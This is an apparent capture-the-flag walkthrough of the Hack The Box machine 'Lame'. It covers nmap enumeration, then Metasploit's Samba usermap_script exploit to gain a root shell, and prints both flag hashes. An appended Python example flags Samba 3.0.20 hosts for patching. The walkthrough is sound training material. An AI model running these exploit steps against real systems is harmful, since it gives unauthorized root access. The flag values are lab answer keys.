
Lame

  • Admin
  • Jan 9, 2022
  • 1 min read

Updated: Jul 10, 2023


Enumeration


As usual, let's start with nmap

nmap -sV -sC 10.10.10.3

This tells us to use -Pn. Let's try:

nmap -sV -sC -Pn 10.10.10.3

nmap tells us that port 445 is open, which is associated with Samba, and that the version is Samba 3.0.20.

Let's google "samba 3.0.20 exploit" and see if there is something available. Looks like there is one and we can access it directly from Metasploit.


Let's load Metasploit using:

msfconsole
search samba 3.0.20

use exploit/multi/samba/usermap_script

show options

We need to set both RHOSTS and LHOST.

set RHOSTS 10.10.10.3

10.10.10.3 is the IP of the target machine.

set LHOST 10.10.14.12

LHOST is the IP of your VM. Mine is 10.10.14.12. Yours will be different.

exploit

It worked! We now have a shell on the target machine.

whoami

We are root!

ls
cd home
ls
cd makis
ls
cat user.txt

856c4e7468499c31b63029bec549af33

Congratulations! You got the user flag!


Now let's look for the root flag:

cd /root
cat user.txt
cat root.txt

674dfcc1c188d43df6664b6fa8ab3a35

Congratulations! You got the root flag!
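
On the defensive side of the enumeration step above, the following added example (not part of the original write-up) parses nmap -sV -sC output and lists the hosts that report Samba 3.0.20, so they can be upgraded or have port 445 isolated. The scan text, the second host and the function names are constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed sample in the layout of nmap's normal output for -sV -sC.
# The second host and its version are invented for contrast.
SAMPLE_SCAN = """\
Nmap scan report for 10.10.10.3
Host is up (0.050s latency).
PORT    STATE SERVICE     VERSION
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)

Host script results:
| smb-os-discovery:
|   OS: Unix (Samba 3.0.20-Debian)

Nmap scan report for files.example.internal (10.10.10.7)
Host is up (0.048s latency).
PORT    STATE SERVICE     VERSION
445/tcp open  netbios-ssn Samba smbd 4.6.2
"""

# An exact x.y.z version; a bare range such as "3.X - 4.X" does not match.
SAMBA_VERSION = re.compile(r"Samba (?:smbd )?(\d+\.\d+\.\d+)")


def samba_versions(scan_text):
    """Return {host_ip: sorted exact Samba versions reported for that host}."""
    found = defaultdict(set)
    host = None
    for line in scan_text.splitlines():
        if line.startswith("Nmap scan report for "):
            # Last token is the address, in parentheses when a hostname precedes it.
            host = line.split()[-1].strip("()")
            found[host]  # record the host even if no exact version appears
        elif host:
            found[host].update(SAMBA_VERSION.findall(line))
    return {h: sorted(v) for h, v in found.items()}


def hosts_running(scan_text, version="3.0.20"):
    """Hosts whose SMB banner or smb-os-discovery output names `version` exactly."""
    return sorted(h for h, v in samba_versions(scan_text).items() if version in v)


if __name__ == "__main__":
    for ip in hosts_running(SAMPLE_SCAN):
        print(f"{ip}: Samba 3.0.20 reported, upgrade or isolate port 445")
```

A host whose banner shows only a version range is recorded with an empty list, which marks it for a follow-up scan rather than clearing it.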

©2025 by My Tech On IT